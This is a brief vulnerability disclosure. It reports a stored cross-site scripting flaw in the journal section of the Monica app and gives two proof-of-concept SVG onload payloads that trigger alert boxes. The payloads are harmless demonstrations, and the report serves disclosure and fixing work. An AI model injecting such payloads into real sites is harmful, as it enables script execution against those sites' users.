HTML codes can be entered and successfully run in the journal session of Monica, which allows an attacker to trigger XSS query’s like <svg/onload=alert("StoredXSS")>
causing a persistant stored XSS in the journal session.
files at monica/2.
<3
<svg/onload=alert("blah!!,blah!!!,blah!!!!")>